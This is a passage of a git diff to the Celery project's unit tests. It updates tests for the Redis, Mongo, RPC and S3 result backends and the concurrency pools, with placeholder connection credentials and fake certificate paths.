mock_collection.delete_many.assert_called()
+ self.backend.collections = mock_collection = Mock()
+ self.backend.expires = None
+
+ self.backend.cleanup()
+ mock_collection.delete_many.assert_not_called()
+
def test_get_database_authfailure(self):
x = MongoBackend(app=self.app)
x._get_connection = Mock()
@@ -525,7 +529,7 @@ def test_regression_worker_startup_info(self):
'/work4us?replicaSet=rs&ssl=true'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -653,18 +657,29 @@ def test_encode_success_results(self, mongo_backend_factory, serializer,
backend = mongo_backend_factory(serializer=serializer)
backend.store_result(TASK_ID, result, 'SUCCESS')
recovered = backend.get_result(TASK_ID)
- if sys.version_info.major == 2 and isinstance(recovered, str):
- result_type = str # workaround for python 2 compatibility and `unicode_literals`
assert type(recovered) == result_type
assert recovered == result
+ @pytest.mark.parametrize("serializer",
+ ["bson", "pickle", "yaml", "json", "msgpack"])
+ def test_encode_chain_results(self, mongo_backend_factory, serializer):
+ backend = mongo_backend_factory(serializer=serializer)
+ mock_request = MagicMock(spec=['children'])
+ children = [self.app.AsyncResult(uuid()) for i in range(10)]
+ mock_request.children = children
+ backend.store_result(TASK_ID, 0, 'SUCCESS', request=mock_request)
+ recovered = backend.get_children(TASK_ID)
+ def tuple_to_list(t): return [list(t[0]), t[1]]
+ assert recovered == [tuple_to_list(c.as_tuple()) for c in children]
+
@pytest.mark.parametrize("serializer",
["bson", "pickle", "yaml", "json", "msgpack"])
def test_encode_exception_error_results(self, mongo_backend_factory,
serializer):
backend = mongo_backend_factory(serializer=serializer)
exception = Exception("Basic Exception")
- backend.store_result(TASK_ID, exception, 'FAILURE')
+ traceback = 'Traceback:\n Exception: Basic Exception\n'
+ backend.store_result(TASK_ID, exception, 'FAILURE', traceback)
recovered = backend.get_result(TASK_ID)
assert type(recovered) == type(exception)
assert recovered.args == exception.args
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index 3f6257c8ae7..f99fbc37a55 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -1,3 +1,4 @@
+import itertools
import json
import random
import ssl
@@ -7,12 +8,15 @@
from unittest.mock import ANY, Mock, call, patch
import pytest
-from case import ContextMock, mock
from celery import signature, states, uuid
from celery.canvas import Signature
-from celery.exceptions import ChordError, ImproperlyConfigured
+from celery.contrib.testing.mocks import ContextMock
+from celery.exceptions import (BackendStoreError, ChordError,
+ ImproperlyConfigured)
+from celery.result import AsyncResult, GroupResult
from celery.utils.collections import AttributeDict
+from t.unit import conftest
def raise_on_second_call(mock, exc, *retval):
@@ -58,7 +62,7 @@ def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
-class PubSub(mock.MockCallbacks):
+class PubSub(conftest.MockCallbacks):
def __init__(self, ignore_subscribe_messages=False):
self._subscribed_to = set()
@@ -75,7 +79,7 @@ def get_message(self, timeout=None):
pass
-class Redis(mock.MockCallbacks):
+class Redis(conftest.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
pubsub = PubSub
@@ -140,7 +144,7 @@ def zadd(self, key, mapping):
def zrange(self, key, start, stop):
# `stop` is inclusive in Redis so we use `stop + 1` unless that would
- # cause us to move from negative (right-most) indicies to positive
+ # cause us to move from negative (right-most) indices to positive
stop = stop + 1 if stop != -1 else None
return [e[1] for e in self._get_sorted_set(key)[start:stop]]
@@ -155,7 +159,7 @@ def zcount(self, key, min_, max_):
return len(self.zrangebyscore(key, min_, max_))
-class Sentinel(mock.MockCallbacks):
+class Sentinel(conftest.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
@@ -273,8 +277,17 @@ def test_drain_events_connection_error(self, parent_on_state_change, cancel_for)
parent_on_state_change.assert_called_with(meta, None)
assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'}
+ def test_drain_events_connection_error_no_patch(self):
+ meta = {'task_id': 'initial', 'status': states.SUCCESS}
+ consumer = self.get_consumer()
+ consumer.start('initial')
+ consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS)
+ consumer._pubsub.get_message.side_effect = ConnectionError()
+ consumer.drain_events()
+ consumer._pubsub.subscribe.assert_not_called()
-class test_RedisBackend:
+
+class basetest_RedisBackend:
def get_backend(self):
from celery.backends.redis import RedisBackend
@@ -287,11 +300,43 @@ def get_E_LOST(self):
from celery.backends.redis import E_LOST
return E_LOST
+ def create_task(self, i, group_id="group_id"):
+ tid = uuid()
+ task = Mock(name=f'task-{tid}')
+ task.name = 'foobarbaz'
+ self.app.tasks['foobarbaz'] = task
+ task.request.chord = signature(task)
+ task.request.id = tid
+ self.b.set_chord_size(group_id, 10)
+ task.request.group = group_id
+ task.request.group_index = i
+ return task
+
+ @contextmanager
+ def chord_context(self, size=1):
+ with patch('celery.backends.redis.maybe_signature') as ms:
+ request = Mock(name='request')
+ request.id = 'id1'
+ group_id = 'gid1'
+ request.group = group_id
+ request.group_index = None
+ tasks = [
+ self.create_task(i, group_id=request.group)
+ for i in range(size)
+ ]
+ callback = ms.return_value = Signature('add')
+ callback.id = 'id1'
+ self.b.set_chord_size(group_id, size)
+ callback.delay = Mock(name='callback.delay')
+ yield tasks, request, callback
+
def setup(self):
self.Backend = self.get_backend()
self.E_LOST = self.get_E_LOST()
self.b = self.Backend(app=self.app)
+
+class test_RedisBackend(basetest_RedisBackend):
@pytest.mark.usefixtures('depends_on_current_app')
def test_reduce(self):
pytest.importorskip('redis')
@@ -305,6 +350,20 @@ def test_no_redis(self):
with pytest.raises(ImproperlyConfigured):
self.Backend(app=self.app)
+ def test_username_password_from_redis_conf(self):
+ self.app.conf.redis_password = 'password'
+ x = self.Backend(app=self.app)
+
+ assert x.connparams
+ assert 'username' not in x.connparams
+ assert x.connparams['password'] == 'password'
+ self.app.conf.redis_username = 'username'
+ x = self.Backend(app=self.app)
+
+ assert x.connparams
+ assert x.connparams['username'] == 'username'
+ assert x.connparams['password'] == 'password'
+
def test_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
@@ -318,6 +377,19 @@ def test_url(self):
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30.0
assert x.connparams['socket_connect_timeout'] == 100.0
+ assert 'username' not in x.connparams
+
+ x = self.Backend(
+ 'redis://username:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['username'] == 'username'
+ assert x.connparams['password'] == 'bosco'
+ assert x.connparams['socket_timeout'] == 30.0
+ assert x.connparams['socket_connect_timeout'] == 100.0
def test_timeouts_in_url_coerced(self):
pytest.importorskip('redis')
@@ -383,6 +455,54 @@ def test_backend_ssl(self):
from redis.connection import SSLConnection
assert x.connparams['connection_class'] is SSLConnection
+ def test_backend_health_check_interval_ssl(self):
+ pytest.importorskip('redis')
+
+ self.app.conf.redis_backend_use_ssl = {
+ 'ssl_cert_reqs': ssl.CERT_REQUIRED,
+ 'ssl_ca_certs': '/path/to/ca.crt',
+ 'ssl_certfile': '/path/to/client.crt',
+ 'ssl_keyfile': '/path/to/client.key',
+ }
+ self.app.conf.redis_backend_health_check_interval = 10
+ x = self.Backend(
+ 'rediss://:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['password'] == 'bosco'
+ assert x.connparams['health_check_interval'] == 10
+
+ from redis.connection import SSLConnection
+ assert x.connparams['connection_class'] is SSLConnection
+
+ def test_backend_health_check_interval(self):
+ pytest.importorskip('redis')
+
+ self.app.conf.redis_backend_health_check_interval = 10
+ x = self.Backend(
+ 'redis://vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['health_check_interval'] == 10
+
+ def test_backend_health_check_interval_not_set(self):
+ pytest.importorskip('redis')
+
+ x = self.Backend(
+ 'redis://vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert "health_check_interval" not in x.connparams
+
@pytest.mark.parametrize('cert_str', [
"required",
"CERT_REQUIRED",
@@ -558,11 +678,11 @@ def test_expire(self):
def test_apply_chord(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
- self.b.apply_chord(header_result, None)
+ self.b.apply_chord(header_result_args, None)
assert self.app.tasks[unlock].apply_async.call_count == 0
def test_unpack_chord_result(self):
@@ -607,6 +727,12 @@ def test_add_to_chord(self):
b.add_to_chord(gid, 'sig')
b.client.incr.assert_called_with(b.get_key_for_group(gid, '.t'), 1)
+ def test_set_chord_size(self):
+ b = self.Backend('redis://', app=self.app)
+ gid = uuid()
+ b.set_chord_size(gid, 10)
+ b.client.set.assert_called_with(b.get_key_for_group(gid, '.s'), 10)
+
def test_expires_is_None(self):
b = self.Backend(expires=None, app=self.app)
assert b.expires == self.app.conf.result_expires.total_seconds()
@@ -623,20 +749,40 @@ def test_set_no_expire(self):
self.b.expires = None
self.b._set_with_state('foo', 'bar', states.SUCCESS)
- def create_task(self, i):
+ def test_process_cleanup(self):
+ self.b.process_cleanup()
+
+ def test_get_set_forget(self):
tid = uuid()
- task = Mock(name=f'task-{tid}')
- task.name = 'foobarbaz'
- self.app.tasks['foobarbaz'] = task
- task.request.chord = signature(task)
- task.request.id = tid
- task.request.chord['chord_size'] = 10
- task.request.group = 'group_id'
- task.request.group_index = i
- return task
+ self.b.store_result(tid, 42, states.SUCCESS)
+ assert self.b.get_state(tid) == states.SUCCESS
+ assert self.b.get_result(tid) == 42
+ self.b.forget(tid)
+ assert self.b.get_state(tid) == states.PENDING
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return(self, restore):
+ def test_set_expires(self):
+ self.b = self.Backend(expires=512, app=self.app)
+ tid = uuid()
+ key = self.b.get_key_for_task(tid)
+ self.b.store_result(tid, 42, states.SUCCESS)
+ self.b.client.expire.assert_called_with(
+ key, 512,
+ )
+
+ def test_set_raises_error_on_large_value(self):
+ with pytest.raises(BackendStoreError):
+ self.b.set('key', 'x' * (self.b._MAX_STR_VALUE_SIZE + 1))
+
+
+class test_RedisBackend_chords_simple(basetest_RedisBackend):
+ @pytest.fixture(scope="class", autouse=True)
+ def simple_header_result(self):
+ with patch(
+ "celery.result.GroupResult.restore", return_value=None,
+ ) as p:
+ yield p
+
+ def test_on_chord_part_return(self):
tasks = [self.create_task(i) for i in range(10)]
random.shuffle(tasks)
@@ -647,13 +793,13 @@ def test_on_chord_part_return(self, restore):
assert self.b.client.zrangebyscore.call_count
jkey = self.b.get_key_for_group('group_id', '.j')
tkey = self.b.get_key_for_group('group_id', '.t')
- self.b.client.delete.assert_has_calls([call(jkey), call(tkey)])
+ skey = self.b.get_key_for_group('group_id', '.s')
+ self.b.client.delete.assert_has_calls([call(jkey), call(tkey), call(skey)])
self.b.client.expire.assert_has_calls([
- call(jkey, 86400), call(tkey, 86400),
+ call(jkey, 86400), call(tkey, 86400), call(skey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return__unordered(self, restore):
+ def test_on_chord_part_return__unordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=False,
)
@@ -673,8 +819,7 @@ def test_on_chord_part_return__unordered(self, restore):
call(jkey, 86400), call(tkey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return__ordered(self, restore):
+ def test_on_chord_part_return__ordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=True,
)
@@ -694,11 +839,28 @@ def test_on_chord_part_return__ordered(self, restore):
call(jkey, 86400), call(tkey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry(self, restore):
+ def test_on_chord_part_return_no_expiry(self):
old_expires = self.b.expires
self.b.expires = None
tasks = [self.create_task(i) for i in range(10)]
+ self.b.set_chord_size('group_id', 10)
+
+ for i in range(10):
+ self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i)
+ assert self.b.client.zadd.call_count
+ self.b.client.zadd.reset_mock()
+ assert self.b.client.zrangebyscore.call_count
+ jkey = self.b.get_key_for_group('group_id', '.j')
+ tkey = self.b.get_key_for_group('group_id', '.t')
+ self.b.client.delete.assert_has_calls([call(jkey), call(tkey)])
+ self.b.client.expire.assert_not_called()
+
+ self.b.expires = old_expires
+
+ def test_on_chord_part_return_expire_set_to_zero(self):
+ old_expires = self.b.expires
+ self.b.expires = 0
+ tasks = [self.create_task(i) for i in range(10)]
for i in range(10):
self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i)
@@ -712,8 +874,7 @@ def test_on_chord_part_return_no_expiry(self, restore):
self.b.expires = old_expires
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry__unordered(self, restore):
+ def test_on_chord_part_return_no_expiry__unordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=False,
)
@@ -734,8 +895,7 @@ def test_on_chord_part_return_no_expiry__unordered(self, restore):
self.b.expires = old_expires
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry__ordered(self, restore):
+ def test_on_chord_part_return_no_expiry__ordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=True,
)
@@ -824,8 +984,8 @@ def test_on_chord_part_return__ChordError(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -840,8 +1000,8 @@ def test_on_chord_part_return__ChordError__unordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.rpush().llen().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.rpush().llen().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -856,8 +1016,8 @@ def test_on_chord_part_return__ChordError__ordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -868,8 +1028,8 @@ def test_on_chord_part_return__other_error(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -884,8 +1044,8 @@ def test_on_chord_part_return__other_error__unordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.rpush().llen().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.rpush().llen().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -900,47 +1060,95 @@ def test_on_chord_part_return__other_error__ordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
callback.id, exc=ANY,
)
- @contextmanager
- def chord_context(self, size=1):
- with patch('celery.backends.redis.maybe_signature') as ms:
- tasks = [self.create_task(i) for i in range(size)]
- request = Mock(name='request')
- request.id = 'id1'
- request.group = 'gid1'
- request.group_index = None
- callback = ms.return_value = Signature('add')
- callback.id = 'id1'
- callback['chord_size'] = size
- callback.delay = Mock(name='callback.delay')
- yield tasks, request, callback
- def test_process_cleanup(self):
- self.b.process_cleanup()
+class test_RedisBackend_chords_complex(basetest_RedisBackend):
+ @pytest.fixture(scope="function", autouse=True)
+ def complex_header_result(self):
+ with patch("celery.result.GroupResult.restore") as p:
+ yield p
+
+ @pytest.mark.parametrize(['results', 'assert_save_called'], [
+ # No results in the header at all - won't call `save()`
+ (tuple(), False),
+ # Simple results in the header - won't call `save()`
+ ((AsyncResult("foo"), ), False),
+ # Many simple results in the header - won't call `save()`
+ ((AsyncResult("foo"), ) * 42, False),
+ # A single complex result in the header - will call `save()`
+ ((GroupResult("foo", []),), True),
+ # Many complex results in the header - will call `save()`
+ ((GroupResult("foo"), ) * 42, True),
+ # Mixed simple and complex results in the header - will call `save()`
+ (itertools.islice(
+ itertools.cycle((
+ AsyncResult("foo"), GroupResult("foo"),
+ )), 42,
+ ), True),
+ ])
+ def test_apply_chord_complex_header(self, results, assert_save_called):
+ mock_group_result = Mock()
+ mock_group_result.return_value.results = results
+ self.app.GroupResult = mock_group_result
+ header_result_args = ("gid11", results)
+ self.b.apply_chord(header_result_args, None)
+ if assert_save_called:
+ mock_group_result.return_value.save.assert_called_once_with(backend=self.b)
+ else:
+ mock_group_result.return_value.save.assert_not_called()
+
+ def test_on_chord_part_return_timeout(self, complex_header_result):
+ tasks = [self.create_task(i) for i in range(10)]
+ random.shuffle(tasks)
+ try:
+ self.app.conf.result_chord_join_timeout += 1.0
+ for task, result_val in zip(tasks, itertools.cycle((42, ))):
+ self.b.on_chord_part_return(
+ task.request, states.SUCCESS, result_val,
+ )
+ finally:
+ self.app.conf.result_chord_join_timeout -= 1.0
+
+ join_func = complex_header_result.return_value.join_native
+ join_func.assert_called_once_with(timeout=4.0, propagate=True)
+
+ @pytest.mark.parametrize("supports_native_join", (True, False))
+ def test_on_chord_part_return(
+ self, complex_header_result, supports_native_join,
+ ):
+ mock_result_obj = complex_header_result.return_value
+ mock_result_obj.supports_native_join = supports_native_join
- def test_get_set_forget(self):
- tid = uuid()
- self.b.store_result(tid, 42, states.SUCCESS)
- assert self.b.get_state(tid) == states.SUCCESS
- assert self.b.get_result(tid) == 42
- self.b.forget(tid)
- assert self.b.get_state(tid) == states.PENDING
+ tasks = [self.create_task(i) for i in range(10)]
+ random.shuffle(tasks)
- def test_set_expires(self):
- self.b = self.Backend(expires=512, app=self.app)
- tid = uuid()
- key = self.b.get_key_for_task(tid)
- self.b.store_result(tid, 42, states.SUCCESS)
- self.b.client.expire.assert_called_with(
- key, 512,
- )
+ with self.chord_context(10) as (tasks, request, callback):
+ for task, result_val in zip(tasks, itertools.cycle((42, ))):
+ self.b.on_chord_part_return(
+ task.request, states.SUCCESS, result_val,
+ )
+ # Confirm that `zadd` was called even though we won't end up
+ # using the data pushed into the sorted set
+ assert self.b.client.zadd.call_count == 1
+ self.b.client.zadd.reset_mock()
+ # Confirm that neither `zrange` not `lrange` were called
+ self.b.client.zrange.assert_not_called()
+ self.b.client.lrange.assert_not_called()
+ # Confirm that the `GroupResult.restore` mock was called
+ complex_header_result.assert_called_once_with(request.group)
+ # Confirm the the callback was called with the `join()`ed group result
+ if supports_native_join:
+ expected_join = mock_result_obj.join_native
+ else:
+ expected_join = mock_result_obj.join
+ callback.delay.assert_called_once_with(expected_join())
class test_SentinelBackend:
@@ -1005,6 +1213,16 @@ def test_url(self):
found_dbs = [cp['db'] for cp in x.connparams['hosts']]
assert found_dbs == expected_dbs
+ # By default passwords should be sanitized
+ display_url = x.as_uri()
+ assert "test" not in display_url
+ # We can choose not to sanitize with the `include_password` argument
+ unsanitized_display_url = x.as_uri(include_password=True)
+ assert unsanitized_display_url == x.url
+ # or to explicitly sanitize
+ forcibly_sanitized_display_url = x.as_uri(include_password=False)
+ assert forcibly_sanitized_display_url == display_url
+
def test_get_sentinel_instance(self):
x = self.Backend(
'sentinel://:test@github.com:123/1;'
@@ -1025,3 +1243,34 @@ def test_get_pool(self):
)
pool = x._get_pool(**x.connparams)
assert pool
+
+ def test_backend_ssl(self):
+ pytest.importorskip('redis')
+
+ from celery.backends.redis import SentinelBackend
+ self.app.conf.redis_backend_use_ssl = {
+ 'ssl_cert_reqs': "CERT_REQUIRED",
+ 'ssl_ca_certs': '/path/to/ca.crt',
+ 'ssl_certfile': '/path/to/client.crt',
+ 'ssl_keyfile': '/path/to/client.key',
+ }
+ self.app.conf.redis_socket_timeout = 30.0
+ self.app.conf.redis_socket_connect_timeout = 100.0
+ x = SentinelBackend(
+ 'sentinel://:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert len(x.connparams['hosts']) == 1
+ assert x.connparams['hosts'][0]['host'] == 'vandelay.com'
+ assert x.connparams['hosts'][0]['db'] == 1
+ assert x.connparams['hosts'][0]['port'] == 123
+ assert x.connparams['hosts'][0]['password'] == 'bosco'
+ assert x.connparams['socket_timeout'] == 30.0
+ assert x.connparams['socket_connect_timeout'] == 100.0
+ assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED
+ assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt'
+ assert x.connparams['ssl_certfile'] == '/path/to/client.crt'
+ assert x.connparams['ssl_keyfile'] == '/path/to/client.key'
+
+ from celery.backends.redis import SentinelManagedSSLConnection
+ assert x.connparams['connection_class'] is SentinelManagedSSLConnection
diff --git a/t/unit/backends/test_rpc.py b/t/unit/backends/test_rpc.py
index f8567400706..71e573da8ff 100644
--- a/t/unit/backends/test_rpc.py
+++ b/t/unit/backends/test_rpc.py
@@ -1,3 +1,4 @@
+import uuid
from unittest.mock import Mock, patch
import pytest
@@ -28,8 +29,22 @@ def setup(self):
def test_oid(self):
oid = self.b.oid
oid2 = self.b.oid
+ assert uuid.UUID(oid)
assert oid == oid2
- assert oid == self.app.oid
+ assert oid == self.app.thread_oid
+
+ def test_oid_threads(self):
+ # Verify that two RPC backends executed in different threads
+ # has different oid.
+ oid = self.b.oid
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: RPCBackend(app=self.app).oid)
+ thread_oid = future.result()
+ assert uuid.UUID(oid)
+ assert uuid.UUID(thread_oid)
+ assert oid == self.app.thread_oid
+ assert thread_oid != oid
def test_interface(self):
self.b.on_reply_declare('task_id')
diff --git a/t/unit/backends/test_s3.py b/t/unit/backends/test_s3.py
index 5733bb6fca4..fdea04b32cc 100644
--- a/t/unit/backends/test_s3.py
+++ b/t/unit/backends/test_s3.py
@@ -140,8 +140,9 @@ def test_with_error_while_getting_key(self, mock_boto3):
with pytest.raises(ClientError):
s3_backend.get('uuidddd')
+ @pytest.mark.parametrize("key", ['uuid', b'uuid'])
@mock_s3
- def test_delete_a_key(self):
+ def test_delete_a_key(self, key):
self._mock_s3_resource()
self.app.conf.s3_access_key_id = 'somekeyid'
@@ -149,12 +150,12 @@ def test_delete_a_key(self):
self.app.conf.s3_bucket = 'bucket'
s3_backend = S3Backend(app=self.app)
- s3_backend._set_with_state('uuid', 'another_status', states.SUCCESS)
- assert s3_backend.get('uuid') == 'another_status'
+ s3_backend._set_with_state(key, 'another_status', states.SUCCESS)
+ assert s3_backend.get(key) == 'another_status'
- s3_backend.delete('uuid')
+ s3_backend.delete(key)
- assert s3_backend.get('uuid') is None
+ assert s3_backend.get(key) is None
@mock_s3
def test_with_a_non_existing_bucket(self):
diff --git a/t/unit/concurrency/test_concurrency.py b/t/unit/concurrency/test_concurrency.py
index a48ef83ce49..1a3267bfabf 100644
--- a/t/unit/concurrency/test_concurrency.py
+++ b/t/unit/concurrency/test_concurrency.py
@@ -1,9 +1,12 @@
+import importlib
import os
+import sys
from itertools import count
from unittest.mock import Mock, patch
import pytest
+from celery import concurrency
from celery.concurrency.base import BasePool, apply_target
from celery.exceptions import WorkerShutdown, WorkerTerminate
@@ -152,3 +155,31 @@ def test_interface_close(self):
def test_interface_no_close(self):
assert BasePool(10).on_close() is None
+
+
+class test_get_available_pool_names:
+
+ def test_no_concurrent_futures__returns_no_threads_pool_name(self):
+ expected_pool_names = (
+ 'prefork',
+ 'eventlet',
+ 'gevent',
+ 'solo',
+ 'processes',
+ )
+ with patch.dict(sys.modules, {'concurrent.futures': None}):
+ importlib.reload(concurrency)
+ assert concurrency.get_available_pool_names() == expected_pool_names
+
+ def test_concurrent_futures__returns_threads_pool_name(self):
+ expected_pool_names = (
+ 'prefork',
+ 'eventlet',
+ 'gevent',
+ 'solo',
+ 'processes',
+ 'threads',
+ )
+ with patch.dict(sys.modules, {'concurrent.futures': Mock()}):
+ importlib.reload(concurrency)
+ assert concurrency.get_available_pool_names() == expected_pool_names
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index dcd803e5342..aff2d310368 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -3,8 +3,12 @@
import pytest
-import t.skip
-from celery.concurrency.eventlet import TaskPool, Timer, apply_target
+pytest.importorskip('eventlet')
+
+from greenlet import GreenletExit # noqa
+
+import t.skip # noqa
+from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa
eventlet_modules = (
'eventlet',
@@ -14,8 +18,6 @@
'greenlet',
)
-pytest.importorskip('eventlet')
-
@t.skip.if_pypy
class EventletCase:
@@ -101,6 +103,7 @@ def test_pool(self):
x.on_apply(Mock())
x._pool = None
x.on_stop()
+ assert len(x._pool_map.keys()) == 1
assert x.getpid()
@patch('celery.concurrency.eventlet.base')
@@ -130,3 +133,32 @@ def test_get_info(self):
'free-threads': x._pool.free(),
'running-threads': x._pool.running(),
}
+
+ def test_terminate_job(self):
+ func = Mock()
+ pool = TaskPool(10)
+ pool.on_start()
+ pool.on_apply(func)
+
+ assert len(pool._pool_map.keys()) == 1
+ pid = list(pool._pool_map.keys())[0]
+ greenlet = pool._pool_map[pid]
+
+ pool.terminate_job(pid)
+ greenlet.link.assert_called_once()
+ greenlet.kill.assert_called_once()
+
+ def test_make_killable_target(self):
+ def valid_target():
+ return "some result..."
+
+ def terminating_target():
+ raise GreenletExit()
+
+ assert TaskPool._make_killable_target(valid_target)() == "some result..."
+ assert TaskPool._make_killable_target(terminating_target)() == (False, None, None)
+
+ def test_cleanup_after_job_finish(self):
+ testMap = {'1': None}
+ TaskPool._cleanup_after_job_finish(None, testMap, '1')
+ assert len(testMap) == 0
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 275d4f2f521..2e2a47353b7 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -5,7 +5,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
import t.skip
from celery.app.defaults import DEFAULTS
@@ -36,8 +35,8 @@ def stop(self):
def apply_async(self, *args, **kwargs):
pass
- mp = _mp() # noqa
- asynpool = None # noqa
+ mp = _mp()
+ asynpool = None
class MockResult:
@@ -53,52 +52,64 @@ def get(self):
return self.value
+@patch('celery.platforms.set_mp_process_title')
class test_process_initializer:
- @patch('celery.platforms.signals')
- @patch('celery.platforms.set_mp_process_title')
- def test_process_initializer(self, set_mp_process_title, _signals):
- with mock.restore_logging():
- from celery import signals
- from celery._state import _tls
- from celery.concurrency.prefork import (WORKER_SIGIGNORE,
- WORKER_SIGRESET,
- process_initializer)
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
-
- def Loader(*args, **kwargs):
- loader = Mock(*args, **kwargs)
- loader.conf = {}
- loader.override_backends = {}
- return loader
-
- with self.Celery(loader=Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
- _signals.reset.assert_any_call(*WORKER_SIGRESET)
- assert app.loader.init_worker.call_count
- on_worker_process_init.assert_called()
